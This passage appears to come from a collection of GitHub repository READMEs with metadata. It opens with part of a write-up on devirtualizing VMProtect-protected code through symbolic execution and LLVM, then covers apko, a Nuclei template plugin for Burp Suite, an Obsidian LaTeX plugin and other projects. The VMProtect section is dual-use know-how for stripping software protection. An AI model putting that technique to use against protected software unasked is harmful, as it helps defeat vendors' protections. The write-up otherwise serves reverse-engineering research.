[+] Synth expr: In: (ite (= (ite (= (_ bv16 8) (bvand (_ bv16 8) (bvxor (bvsub (_ bv80 8) ((_ extract 7 0) (bvadd (bvlsh ... [+] LLVM IR ============================== ; ModuleID = 'tritonModule' source_filename = "tritonModule" define i32 @__triton(i32 %SymVar_0, i32 %SymVar_1) { entry: %0 = add i32 %SymVar_1, -1 %1 = add i32 %SymVar_0, 1 %2 = add i32 %SymVar_1, %SymVar_0 %3 = xor i32 %2, -1 %4 = xor i32 %2, -1 %5 = and i32 %4, %3 %6 = xor i32 %5, 1001 %7 = add i32 %5, 1001 %8 = xor i32 %5, 1001 %9 = xor i32 %8, %7 %10 = and i32 %9, %6 [... skip ...] %469 = add i64 %468, 140737488347280 %470 = trunc i64 %469 to i8 %471 = xor i8 80, %470 %472 = sub i8 80, %470 %473 = xor i8 %472, %471 %474 = and i8 16, %473 %475 = icmp eq i8 16, %474 %476 = select i1 %475, i1 true, i1 false %477 = icmp eq i1 %476, false %478 = select i1 %477, i32 %1, i32 %0 ret i32 %478 } [+] EOF LLVM IR ============================== ``` At this step, we have devirtualized the two traces and merged them into `if-then-else` expressions. After lifting the expression to LLVM-IR we get a CFG with only 480 LLVM instructions, which is already a good win compared to the thousands of instructions executed by the virtual machine. But we can do better if we use LLVM optimizations: ```llvm $ opt -S -O3 ./devirt/sample5.ll ; ModuleID = './devirt/sample5.ll' source_filename = "tritonModule" ; Function Attrs: mustprogress nofree norecurse nosync nounwind readnone willreturn define i32 @__triton(i32 %SymVar_0, i32 %SymVar_1) local_unnamed_addr #0 { entry: %0 = add i32 %SymVar_0, 1 %1 = add i32 %SymVar_1, -1 %2 = add i32 %SymVar_1, %SymVar_0 %.not = icmp eq i32 %2, 1001 %3 = select i1 %.not, i32 %0, i32 %1 ret i32 %3 } attributes #0 = { mustprogress nofree norecurse nosync nounwind readnone willreturn } ``` Woot, we recovered the original behavior of the `secret` function! # Conclusion and limitations While the approach showed very good results for functions that contain one path, the main limitation of the method is that it is mostly geared towards programs with a small number of paths due to the way VMProtect does virtual jumps. If the number of paths is too high, parts of the original code may be lost, yielding an incomplete recovery. Note that we are considering executable paths rather than syntactic paths in the CFG. Hash and other cryptographic functions often have only very few paths - only one path in the case of timing-attack resistant implementations. Also, our current implementation is limited to programs without any user-dependent memory access. This limitation can be partly removed by using a more symbolic handling of memory accesses in DSE. Note also that while bounded loops and non-recursive function calls are handled, they are currently recovered as inlined or unrolled code, causing a potential blowup in size of the devirtualized code. It would be interesting to have a post-processing step trying to rebuild these high-level abstractions. To conclude, please note that I'm not aiming to provide any kind of magic method; those are just some notes about a dynamic attack against very specific cases protected by VMProtect =).
If you want to take a deeper look, check out those resources: * [The Pintool to generate trace](pin/source/tools/VMP_Trace/VMP_Trace.cpp) * [Script to analyze a VMP trace](attack_vmp.py) * [Samples source code](vmp_binaries/samples-source) * [Original and protected binaries](vmp_binaries/binaries) * [VMP traces](vmp_traces) * [Devirtualized results](devirt) Last but not least, special thanks to my mate [@0vercl0k](https://twitter.com/0vercl0k) for proofreading and edits :rocket: # References ``` [00] https://www.usenix.org/legacy/event/woot09/tech/full_papers/rolles.pdf [01] https://secret.club/2021/09/08/vmprotect-llvm-lifting-1.html [02] https://secret.club/2021/09/08/vmprotect-llvm-lifting-2.html [03] https://secret.club/2021/09/08/vmprotect-llvm-lifting-3.html [04] https://back.engineering/17/05/2021/ [05] https://back.engineering/21/06/2021/ [06] https://www.mitchellzakocs.com/blog/vmprotect3 [07] https://github.com/can1357/NoVmp [08] https://github.com/archercreat/vmpfix [09] https://github.com/void-stack/VMUnprotect [10] https://github.com/JonathanSalwan/Triton/blob/master/publications/DIMVA2018-slide-deobfuscation-salwan-bardin-potet.pdf [11] https://whereisr0da.github.io/blog/posts/2021-02-16-vmp-3/ [12] https://github.com/pgarba/UniTaint [13] https://github.com/mrexodia/VMProtectTest ```
Playing with the VMProtect software protection. Automatic deobfuscation of pure functions using symbolic execution and LLVM.
vmprotect,symbolic-execution,program-analysis,llvm-ir,deobfuscation
0
1
2
4
0
1
0
chainguard-dev/apko
# apko: apk-based OCI image builder Build and publish [OCI container images](https://opencontainers.org/) built from [apk](https://wiki.alpinelinux.org/wiki/Package_management) packages. apko has the following key features: - **Fully reproducible by default.** Run apko twice and you will get exactly the same binary. - **Fast.** apko aims to build images in ms. - **Small.** apko generated images only contain what's needed by the application, in the style of [distroless](https://github.com/GoogleContainerTools/distroless). - **SBOM Support.** apko produces a Software Bill of Materials (SBOM) for images, detailing all the packages inside. - **Services.** apko supports using the [s6 supervision suite](https://skarnet.org/software/s6) to run multiple processes in a container without reaping or signalling issues. Please note that apko is a work in progress and details are subject to change! ## Installation You can install apko from Homebrew: ```shell brew install apko ``` You can also install apko from source: ```shell go install chainguard.dev/apko@latest ``` You can also use the apko container image: ```shell docker run cgr.dev/chainguard/apko version ``` To use the examples, you'll generally want to mount your current directory into the container, e.g.: ```shell docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:edge apko-alpine.tar ``` Alternatively, if you're on a Mac, you can use [Lima](./mac/README.md) to run an Alpine Linux VM. ## Quickstart An apko file for building an Alpine base image looks like this: ```yaml contents: repositories: - https://dl-cdn.alpinelinux.org/alpine/edge/main packages: - alpine-base entrypoint: command: /bin/sh -l # optional environment configuration environment: PATH: /usr/sbin:/sbin:/usr/bin:/bin ``` We can build this with apko from any environment with apk tooling: ```shell apko build examples/alpine-base.yaml apko-alpine:test apko-alpine.tar ``` ``` ... 2022/04/08 13:22:31 apko (aarch64): generating SBOM 2022/04/08 13:22:31 building OCI image from layer '/tmp/apko-3027985148.tar.gz' 2022/04/08 13:22:31 OCI layer digest: sha256:ba034c07d0945abf6caa46fe05268d2375e4209e169ff7fdd34d40cf4e5f2dd6 2022/04/08 13:22:31 OCI layer diffID: sha256:9b4ab6bb8831352b25c4bd21ee8259d1f3b2776deec573733291d71a390157bb 2022/04/08 13:22:31 output OCI image file to apko-alpine.tar ``` or, with Docker: ```shell docker run -v "$PWD":/work cgr.dev/chainguard/apko build examples/alpine-base.yaml apko-alpine:test apko-alpine.tar ``` You can then load the generated tar image into a Docker environment: ```shell docker load < apko-alpine.tar ``` ```shell Loaded image: apko-alpine:test ``` ```shell docker run -it apko-alpine:test ``` ``` e289dc84c4ad:/# echo boo! boo! ``` You can also publish the image directly to a registry: ```shell apko publish examples/alpine-base.yaml myrepo/alpine-apko:test ``` See the [docs](./docs/apko_file.md) for details of the file format and the [examples directory](./examples) for more, err, examples! ## Why apko was created by [Chainguard](https://www.chainguard.dev), who require secure and reproducible container images for their tooling. Speed is also a critical factor; Chainguard require images to be rebuilt constantly in response to new versions and patches. The design of apko is heavily influenced by the [ko](https://github.com/google/ko) and [distroless](https://github.com/GoogleContainerTools/distroless) projects. 
## Declarative Nature By design, apko doesn't support an equivalent of `RUN` statements in Dockerfiles. This means apko files are fully declarative, which allows apko to make stronger statements about the contents of images. In particular, apko images are fully bitwise reproducible and can generate SBOMs covering their complete contents. In order to install bespoke tooling or applications into an image, they must first be packaged into an apk. This can be done with apko's sister tool [melange](https://github.com/chainguard-dev/melange). The combination of melange and apko covers the vast majority of use cases when building container images. In the cases where they are not a good fit, our recommendation is to build a base image with apko and melange, then use traditional tooling such as Dockerfiles for the final step. ## Support and Further Reading Tutorials and guides for apko can be found at the [Chainguard Academy](https://edu.chainguard.dev/open-source/apko/). For support, please find us on the [Kubernetes Slack](https://kubernetes.slack.com/) in the #apko channel or [open an issue](https://github.com/chainguard-dev/apko/issues). ## Related Work and Resources The [melange project](https://github.com/chainguard-dev/melange) is designed to produce apk packages to be used in apko. The [ko](https://github.com/google/ko) project builds Go projects from source in a similar manner to apko. The [kontain.me](https://github.com/imjasonh/kontain.me) service creates fresh container images on demand using different forms of declarative configuration (including ko and apko).
Build OCI images from APK packages directly without Dockerfile
docker,oci,containers
41
52
950
2,098
71
4
6
NafisiAslH/KnowledgeSharing
# KnowledgeSharing Under Construction .... ## Support You can follow [me](https://twitter.com/MeAsHacker_HNA) on Twitter or <br><br><a href="https://www.buymeacoffee.com/NafisiAslH" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png" alt="Buy Me A Coffee" style="height: 60px !important;width: 217px !important;" ></a>
null
null
0
2
2
348
2
1
0
projectdiscovery/nuclei-burp-plugin
<h1 align="center"> <br> <a href="https://nuclei.projectdiscovery.io"><img src="static/nuclei-logo.png" width="200px" alt="Nuclei Burp Plugin"></a> </h1> <h4 align="center">Nuclei Template Generator Burp Plugin</h4> <p align="center"> <a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a> <a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a> </p> <p align="center"> A `Burp Suite` plugin intended to help with [`nuclei`](https://github.com/projectdiscovery/nuclei) template generation. </p> <div align="center"> <br/> <a href="https://www.youtube.com/watch?v=PMHCnaU7dfo" target="_blank"><img src="static/video_thumbnail.png" alt="Nuclei Burp Plugin Demo Video"></a> <br/><br/> <a href="https://nuclei.projectdiscovery.io" target="_blank"><img src="static/demo.gif" alt="Nuclei Burp Plugin Demo"></a> <br/><br/> <a href="https://nuclei.projectdiscovery.io" target="_blank"><img src="static/v1_1_0-demo.gif" alt="Nuclei Burp Plugin v1.1.0 Demo"></a> </div> ## Features ### Template matcher generation * `Word` and `Binary` matcher creation using selected response snippets from `Proxy` history or `Repeater` contexts * Multi-line selections are split to separate words for readability * Binary matchers are created for selections containing non-`ASCII` characters * The `part` field is auto-set based on whether the selection was in the request header or body * Every generated template auto-includes a `Status` matcher, using the `HTTP` status code of the response ### Modifying generated templates * New matchers and requests can be added to previously generated templates, by highlighting a part of a response * In case of a CVE, template information fields can be filled in automatically (Right-click on a template, Add โ†’ Classification โ†’ CVE) ### Request template generation * In the `Intruder` tab, selected payload positions can be used to generate request templates, using one of the following attack types: `Battering ram`, `Pitchfork` or `Cluster bomb` * The selected text snippet from an `HTTP` request under the `Proxy` or `Repeater` tab can be used to generate a request template with the attack type defaulting to `Battering ram` * Templates containing multiple requests can be generated by selecting multiple proxy items and clicking generate ### Template execution * Generated templates can be executed instantly, and the output is shown in the same window for convenience * The plugin auto-generates the CLI command, using the absolute nuclei path, absolute template path and target information extracted from the desired request * History of unique, executed commands are stored, can be quick searched and re-executed within the current session * CLI flag filtering and completion support can be accessed using the `CTRL + R` keyboard shorcut ### Experimental features * (Non-contextual) `YAML` property and value **auto-complete**, using reserved words from the nuclei [`JSON` schema](https://github.com/projectdiscovery/nuclei/blob/master/nuclei-jsonschema.json) * **Syntax highlighting** of `YAML` properties, based on reserved words ### Productivity * Almost every action can be triggered using keyboard shortcuts: * **F1**: open nuclei template documentation * **Ctrl + Enter**: execute current template * **Ctrl + Shift + E**: jump to the template editor * **Ctrl + L**: jump to the CLI input field * **Ctrl + R**: show CLI argument helper * **Ctrl + S**: save the current template * 
**Ctrl + Plus/Minus**: increase/decrease font size * **Ctrl + Q**: quit * Tab support: * **Ctrl + Tab** or **Ctrl + PageDown**: open next tab * **Ctrl + Shift + Tab** or **Ctrl + PageUp**: open previous tab * **Ctrl + [1-9]**: move to n-th tab * **Mouse Scroll Up/Down** over the tabs: navigate to next or previous tab * **Ctrl + W** or **Middle Mouse Button Click**: close current tab * The template path is auto-updated if the template is saved to a new location * The `template-id` is recommended as the file name when saving ### Settings * The plugin attempts to auto-detect and complete the configuration values * The code searches for the nuclei binary path, using the values from the process's environment `PATH` variable. **Note**: the Burp Suite binary, as opposed to the stand-alone BurpSuite jar, might not have access to the current user's `PATH` variable. * The target template path is calculated based on the default nuclei template directory, configured under `<USER_HOME>/.config/nuclei/.templates-config.json` * The name of the currently logged-in operating system user is used as a default value for the template author configuration * The user can decide whether to display the generated template in a dedicated window or embedded under "Generator", within the Nuclei tab ### Look and feel * The template generator window supports Dark and Light themes. The presented theme is chosen based on the selected Burp Suite theme, under `User Options` * Support for **colored** nuclei output * Modifiable font size in the template editor and command output ## Building the code Use `mvn clean package -DskipTests` to build the project yourself. It requires Maven `3.x` and Java `11+`. On macOS the dependencies for the plugin can be met using Homebrew: `brew install maven openjdk@11` Alternatively, different builds can be downloaded from the [Actions](https://github.com/projectdiscovery/nuclei-burp-plugin/actions) section. The built artifact can be found under the latest build's `Artifacts` section. These artifacts are generated after every commit, but are only stored for a limited amount of time. ## Installation By building the code: 1. Build the code yourself or download a pre-built/[release](https://github.com/projectdiscovery/nuclei-burp-plugin/releases) version 2. Go to `Extender` in `Burp Suite` 3. Click the `Add` button in the `Extensions` tab 4. Leave the `Extension Type` on `Java` 5. Select the path to the plugin (`.jar`) Through [BApp Store](https://portswigger.net/bappstore/526f5564b7414bfe978e650d8ea6567b): 1. Go to `Extender` in `Burp Suite` 2. Select the `BApp Store` tab 3. Search for **Nuclei Template Generator Plugin** 4. Click on **Install** Note: this plugin does **NOT** require **Burp Suite Professional**. ## Screenshots ![Generated Word matcher on response header](static/generated_header_word_matcher_template.png "Generated Word matcher on response header") ![Generated multi-word matcher on response body](static/generated_body_multi_word_matcher_template.png "Generated multi-word matcher on response body") ![Generated request template using Battering ram](static/generated_batteringram_request_template.png "Generated request template using Battering ram") ### Credits Created with ❤️ by [@forgedhallpass](https://github.com/forgedhallpass) ### License Nuclei and this plugin are distributed under [MIT License](LICENSE).
<h1 align="left"> <a href="https://discord.gg/projectdiscovery"><img src="static/join-discord.png" width="380" alt="Join Discord"></a> <a href="https://nuclei.projectdiscovery.io"><img src="static/check-nuclei-documentation.png" width="380" alt="Check Nuclei Documentation"></a> </h1>
Nuclei plugin for BurpSuite
null
6
36
67
171
17
5
1
artisticat1/obsidian-latex-suite
# Obsidian Latex Suite <img src="https://img.shields.io/github/manifest-json/v/artisticat1/obsidian-latex-suite"> <img src="https://img.shields.io/github/downloads/artisticat1/obsidian-latex-suite/total"> A plugin for Obsidian that aims to make typesetting LaTeX math as fast as handwriting. Inspired by [Gilles Castel's setup using UltiSnips](https://castel.dev/post/lecture-notes-1/). ![demo](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/demo.gif) The plugin's main feature is **snippets**, which help you write LaTeX quicker through shortcuts and text expansion! For example, type - "sqx" instead of "\sqrt{x}" - "a/b" instead of "\frac{a}{b}" - "par x y " instead of "\frac{\partial x}{\partial y}" See [Gilles Castel's writeup](https://castel.dev/post/lecture-notes-1/) for more information. The plugin comes with a [set of default snippets](https://github.com/artisticat1/obsidian-latex-suite/blob/main/src/default_snippets.js), loosely based on [Gilles Castel's](https://castel.dev/post/lecture-notes-1/#other-snippets). You can modify them, remove them, and write your own. ## Usage To get started, type "dm" to enter display math mode. Try typing the following: - "xsr" โ†’ "x^{2}". - "x/y <kbd>Tab</kbd>" โ†’ "\\frac{x}{y}". - "sin @t" โ†’ "\\sin \\theta". **Have a look at the [cheatsheet](#cheatsheet)** for a list of commonly used default snippets. Once these feel familiar, you can check out the [default snippets](https://github.com/artisticat1/obsidian-latex-suite/blob/main/src/default_snippets.js) for more commands. e.g. - "par <kbd>Tab</kbd> f <kbd>Tab</kbd> x <kbd>Tab</kbd>" โ†’ "\\frac{\\partial f}{\\partial x}". - "dint <kbd>Tab</kbd> 2pi <kbd>Tab</kbd> sin @t <kbd>Tab</kbd> @t <kbd>Tab</kbd>" โ†’ "\\int_{0}^{2\pi} \\sin \\theta \\, d\\theta". You can also add your own snippets! [See here for more info on writing snippets](#snippets). You can [view snippets written by others and share your own snippets here](https://github.com/artisticat1/obsidian-latex-suite/discussions/50). ## Features ### Auto-fraction Lets you type "1/x" instead of "\frac{1}{x}". For example, it makes the following expansions: - `x/` โ†’ `\frac{x}{}` - `(a + b(c + d))/` โ†’ `\frac{a + b(c + d)}{}` and moves the cursor inside the brackets. Once done typing the denominator, press <kbd>Tab</kbd> to exit the fraction. ![auto-fraction](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/auto-fraction.gif) ### Matrix shortcuts While inside a matrix, array, align, or cases environment, - Pressing <kbd>Tab</kbd> will insert the "&" symbol - Pressing <kbd>Enter</kbd> will insert "\\\\" and move to a new line - Pressing <kbd>Shift + Enter</kbd> will move to the end of the next line (can be used to exit the matrix) ![matrix shortcuts](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/matrix_shortcuts.gif) ### Conceal *This feature must be enabled in settings!* Make your equations more readable by hiding LaTeX code, instead rendering it in a pretty format. For example, "\dot{x}^{2} + \dot{y}^{2}" will be displayed as "แบ‹ยฒ + แบยฒ". To reveal the LaTeX code, move the cursor over it. ![conceal demo](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/conceal.png) ![conceal demo 2](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/conceal.gif) ### Tabout - Pressing <kbd>Tab</kbd> while the cursor is at the end of an equation will move the cursor outside the $ symbols. 
- Otherwise, pressing <kbd>Tab</kbd> will advance the cursor to the next closing bracket: ), ], }, >, or |. ### Preview inline math When the cursor is inside inline math, a popup window showing the rendered math will be displayed. <img width=500 src="https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/inline_math_preview_1.png"> <img width=650 src="https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/inline_math_preview_2.png"> ### Color & highlight matching brackets - Matching brackets are rendered in the same color, to help with readability. - When the cursor is adjacent to a bracket, that bracket and its pair will be highlighted. - When the cursor is inside brackets, the enclosing brackets will be highlighted. ![color and highlight matching brackets demo](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/color_brackets.gif) ### Visual snippets Sometimes you want to annotate math, or cancel or cross out terms. Selecting some math with the cursor and typing - "U" will surround it with "\\underbrace". - "O" will surround it with "\\overbrace". - "C" will surround it with "\\cancel". - "K" will surround it with "\\cancelto". - "B" will surround it with "\\underset". ![visual snippets](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/visual_snippets.gif) ### Auto-enlarge brackets When a snippet containing "\\sum", "\\int" or "\\frac" is triggered, any enclosing brackets will be enlarged with "\\left" and "\\right". ![auto-enlarge brackets](https://raw.githubusercontent.com/artisticat1/obsidian-latex-suite/main/gifs/auto-enlarge_brackets.gif) ### Editor commands - Box current equation โ€“ surround the equation the cursor is currently in with a box. - Select current equation โ€“ select the equation the cursor is currently in. ### Snippets Snippets are formatted as follows: ```typescript { trigger: string | RegExp, replacement: string, options: string, priority?: number, description?: string, flags?: string, } ``` - `trigger` : The text that triggers this snippet. - Triggers can also be regular expressions. [See here for more info.](./DOCS.md#regex-snippets) - `replacement` : The text to replace the `trigger` with. - Replacements can also be JavaScript functions. [See here for more info.](./DOCS.md#function-snippets) - `options` : See below. - `priority` (optional): This snippet's priority. Snippets with higher priority are run first. Can be negative. Defaults to 0. - `description` (optional): A description for this snippet. - `flags` (optional): Flags for regex snippets. #### Options - `t` : Text mode. Only run this snippet outside math - `m` : Math mode. Only run this snippet inside math. Shorthand for both `M` and `n` - `M` : Block math mode. Only run this snippet inside a `$$ ... $$` block - `n` : Inline math mode. Only run this snippet inside a `$ ... $` block - `A` : Auto. Expand this snippet as soon as the trigger is typed. If omitted, the <kbd>Tab</kbd> key must be pressed to expand the snippet - `r` : [Regex](./DOCS.md#regex-snippets). The `trigger` will be treated as a regular expression - `v` : [Visual](./DOCS.md#visual-snippets). Only run this snippet on a selection. The trigger should be a single character - `w` : Word boundary. Only run this snippet when the trigger is preceded (and followed by) a word delimiter, such as `.`, `,`, or `-`. - `c` : Code mode. Only run this snippet inside a ```` ``` ... 
``` ```` block Insert **tabstops** for the cursor to jump to by writing "$0", "$1", etc. in the `replacement`. For more details on writing snippets, including **regex** snippets and **function** snippets, [see the **documentation** here](DOCS.md). You can [view snippets written by others and share your own snippets here](https://github.com/artisticat1/obsidian-latex-suite/discussions/50). > [!WARNING] > Snippet files are interpreted as JavaScript and can execute arbitrary code. > Always be careful with snippets shared from others to avoid running malicious code. ## Cheatsheet | Trigger | Replacement | | ------------------ | ---------------- | | mk | \$ \$ | | dm | \$\$<br><br>\$\$ | | sr | ^{2} | | cb | ^{3} | | rd | ^{ } | | \_ | \_{ } | | sq | \\sqrt{ } | | x/y <kbd>Tab</kbd> | \\frac{x}{y} | | // | \\frac{ }{ } | | " | \\text{ } | | text | \\text{ } | | x1 | x_{1} | | x,. | \\mathbf{x} | | x., | \\mathbf{x} | | xdot | \\dot{x} | | xhat | \\hat{x} | | xbar | \\bar{x} | | xvec | \\vec{x} | | xtilde | \\tilde{x} | | xund | \\underline{x} | | ee | e^{ } | | invs | ^{-1} | When running a snippet that **moves the cursor inside brackets {}, press <kbd>Tab</kbd> to exit the brackets**. ### Greek letters | Trigger | Replacement | Trigger | Replacement | | ------- | ------------ | ------- | ----------- | | @a | \\alpha | eta | \\eta | | @b | \\beta | mu | \\mu | | @g | \\gamma | nu | \\nu | | @G | \\Gamma | xi | \\xi | | @d | \\delta | Xi | \\Xi | | @D | \\Delta | pi | \\pi | | @e | \\epsilon | Pi | \\Pi | | :e | \\varepsilon | rho | \\rho | | @z | \\zeta | tau | \\tau | | @t | \\theta | phi | \\phi | | @T | \\Theta | Phi | \\Phi | | @k | \\kappa | chi | \\chi | | @l | \\lambda | psi | \\psi | | @L | \\Lambda | Psi | \\Psi | | @s | \\sigma | | | | @S | \\Sigma | | | | @o | \\omega | | | | ome | \\omega | | | For greek letters with short names (2-3 characters), just type their name, e.g. "pi" โ†’ "\\pi" ## Contributing Any contributions and PRs are welcome! ## Acknowledgements - [@tth05](https://github.com/tth05)'s [Obsidian Completr](https://github.com/tth05/obsidian-completr) for the basis of the tabstop code - [Dynamic Highlights](https://github.com/nothingislost/obsidian-dynamic-highlights/blob/master/src/settings/ui.ts) for reference - [Quick Latex for Obsidian](https://github.com/joeyuping/quick_latex_obsidian) for inspiration ## Support If you like this plugin and want to say thanks, you can buy me a coffee here! <a href='https://ko-fi.com/J3J6BBZAW' target='_blank'><img height='56' style='border:0px;height:56px;' src='https://cdn.ko-fi.com/cdn/kofi1.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a>
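Returning to the snippet format documented above, a minimal custom snippet might look like the following sketch. It auto-expands "bb" to "\mathbb{}" inside math mode, with a "$0" tabstop placing the cursor between the braces (the trigger and replacement are illustrative examples, not necessarily part of the default snippet set):

```typescript
// Sketch of a custom snippet: "bb" -> "\mathbb{}" with the cursor inside.
{
  trigger: "bb",
  replacement: "\\mathbb{$0}", // $0 is a tabstop: the cursor lands here
  options: "mA", // m: only inside math, A: auto-expand without pressing Tab
  description: "blackboard bold",
}
```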
Make typesetting LaTeX as fast as handwriting through snippets, text expansion, and editor enhancements
latex,obsidian,obsidian-plugin,snippets,math,obsidian-md,text-expansion
55
17
43
606
99
1
1
Skykai521/DingDongHelper
# DingDongHelper ### An order-grabbing plugin for the Dingdong Maicai (叮咚买菜) grocery app. Android only. ### Important notes **1. The plugin places orders more slowly than doing so manually, so it is not recommended during peak hours; you can try it once peak time has passed, but a successful order still cannot be guaranteed 100%.** **2. The plugin is not guaranteed to be compatible with every device model and Android version. If it does not work for you, please uninstall it promptly.** ### Download 1. [https://github.com/Skykai521/DingDongHelper/blob/main/app/release/app-release.apk](https://github.com/Skykai521/DingDongHelper/blob/main/app/release/app-release.apk) 2. Follow the WeChat official account **SkyKai** and reply **叮咚助手** ("DingDong Helper"). ### Copyright notice **This project is licensed under GPL-3.0. All developers creating derivative works must comply with GPL-3.0, and the code must not be used commercially.**
ๅฎๅ’šไนฐ่œๆŠข่œๆ’ไปถ
null
0
2
1
10
0
1
0
kikipoulet/SukiUI
<div id="header" align="center"> <img src="https://raw.githubusercontent.com/kikipoulet/SukiUI/main/Images/OIG.N5o-removebg-preview.png" ></img> <h3>Suki UI</h3> <h4><i>A Desktop UI Library for <a href="https://avaloniaui.net/">Avalonia</a></i></h4> <div id="badges" > <a href="https://github.com/kikipoulet/SukiUI/wiki/1.-Installation"><img src="https://img.shields.io/badge/GET%20STARTED-purple?style=for-the-badge" alt="Get Started"/></a> <a href="https://www.nuget.org/packages/SukiUI"><img src="https://img.shields.io/nuget/vpre/SukiUI?style=for-the-badge" alt="Nuget Pre"/></a> <a href="https://github.com/kikipoulet/SukiUI/blob/main/LICENSE"><img src="https://img.shields.io/github/license/kikipoulet/SukiUI?style=for-the-badge" alt="License"/></a> </div> </div> <br/> #### Try our Controls Gallery App on Microsoft Store ! <span> <a href="https://apps.microsoft.com/detail/9NM01BJ6JTTF?hl=en-us&gl=US"> <img src="https://get.microsoft.com/images/en-us%20light.svg" alt="Download SukiUI Controls Gallery" /> </a> </span> <br/> <br/> ### โœจ Upcoming : Use [Dock](https://github.com/wieslawsoltes/Dock) library with SukiUI ! <br/> ![image](https://github.com/kikipoulet/SukiUI/assets/19242427/0b4af54b-9903-4df5-9ca1-6577c878d477) Credits to @wieslawsoltes for the Dock library. <br/> ## ๐Ÿ“„ Documentation [Wiki](https://github.com/kikipoulet/SukiUI/wiki) [SukiUI Documentation](https://kikipoulet.github.io/SukiUI/) *Work in Progress* ๐Ÿš€ <br/><br/> ## ๐Ÿ“ฑ UI Theme ##### SukiUI contains a theme for AvaloniaUI's base controls with support for Light/Dark themes. ##### SukiUI offers the ability to choose and switch between different color themes, as well as create custom ones. ![colorthemes](https://github.com/kikipoulet/SukiUI/assets/19242427/72c4cc35-876c-47ec-8205-cf6a37be1c59) ## ๐Ÿ•น Rich Animations ##### SukiUI places special emphasis on creating rich and intuitive animations for the themed controls. <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/40c93232-c45a-4dd7-b559-e8e22cff9748" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/36b1a516-2f16-4d0d-82b2-df59003e2ec6" ></img> </kbd> ## ๐Ÿ”จ Additional Controls ##### SukiUI contains additional controls to offer the possibility to make rich and diversified User Interface. <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/0499e9bb-2187-4c52-bbe2-ac38260dabfa" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/0dc7a093-408e-4560-b57a-07d427f64f86" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/88095be5-565c-4aa2-bddc-ee040ea67ebe" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/ac1f43e2-f7cd-4ac7-b64d-e83b5952b019" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/a07a5a38-eccf-47a0-b992-abc41d7ee70d" ></img> </kbd> ## โš’ UI Functionalities ##### SukiUI offer an easy way to display Dialog and Notifications in your application. <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/b29ae757-9d6a-461a-bd6f-6949c3f0ccec" ></img> </kbd> <kbd> <img src="https://github.com/kikipoulet/SukiUI/assets/19242427/60b7d946-e7b1-42b8-8aca-487f92a50ac2" ></img> </kbd>
UI Theme for AvaloniaUI
null
1
15
102
827
11
2
2
521xueweihan/OneFile
# OneFile <p align="center"> <img src="https://cdn.jsdelivr.net/gh/521xueweihan/img_logo@main/logo/onefile.png"/> <br>One file to amaze everyone!</p> <p align="center"> <a href="https://cdn.jsdelivr.net/gh/521xueweihan/img_logo@main/logo/weixin.png"><img src="https://img.shields.io/badge/Talk-%E5%BE%AE%E4%BF%A1%E7%BE%A4-brightgreen.svg?style=popout-square" alt="WeiXin"></a> <a href="https://github.com/521xueweihan/OneFile/stargazers"><img src="https://img.shields.io/github/stars/521xueweihan/OneFile.svg?style=popout-square" alt="GitHub stars"></a> <a href="https://weibo.com/hellogithub"><img src="https://img.shields.io/badge/%E6%96%B0%E6%B5%AA-Weibo-red.svg?style=popout-square" alt="Sina Weibo"></a> </p> ## Introduction OneFile collects open-source projects that fit in a single file, are simple to run, and can be understood at a glance. They include games, compilers, servers, tools, utility libraries and more. They are simple and fun, and **the code runs as soon as you copy it**, letting you instantly rediscover the fun of programming and the joy of a program that runs successfully! ## Projects [Click here to join](https://github.com/521xueweihan/OneFile/blob/main/doc/join.md) the OneFile programming challenge and write the code you are interested in. Contributing to open source takes only one file: [click here](https://hellogithub.yuque.com/forms/share/4f0bf06b-2991-4f7e-a860-5b76337b7b5b) to submit your code. | Name | Language | Description | Action | | ------- | ----- | ------------ | --------- | | [tinyhttpd](https://github.com/EZLippi/Tinyhttpd) | C | An ultra-lightweight HTTP server in under 500 lines... | [Source](https://hellogithub.com/onefile/code/7e574fc7d58d4fae950a95d7bdb87d09) | | [si78c](https://github.com/loadzero/si78c) | C | A command-line Space Invaders game written in C | [Source](https://hellogithub.com/onefile/code/cb8e4fbc5a174664ac325a521ee6d02f) | | [minilisp](https://github.com/rui314/minilisp) | C | A Lisp interpreter written in C. Implements integers, symbols... | [Source](https://hellogithub.com/onefile/code/9a51afad2a7e49fb8dd79136866674f4) | | [cJSON](https://github.com/DaveGamble/cJSON) | C | An ultra-lightweight JSON parser implemented in standard C (C89)... | [Source](https://hellogithub.com/onefile/code/2f497887abdb44879e3d523981dae933) | | [filedb](https://github.com/LiuYuguang/supersimplefiledatabase) | C | A B-tree-based file database | [Source](https://hellogithub.com/onefile/code/3ed05321bf5f483dbdcbea636ca4b914) | | [threadpoll](https://github.com/progschj/ThreadPool) | C++ | A simple C++11 thread pool implementation | [Source](https://hellogithub.com/onefile/code/d0c3498b528f485996c9dc5dc4dfa4cb) | | [minesweeper](https://github.com/521xueweihan/OneFile/blob/main/src/html/minesweeper.html) | HTML | A Minesweeper game | [Demo](https://hellogithub.com/onefile/demo/e235d1d133134aea93ca6cdf2ed4fc5d.html) | | 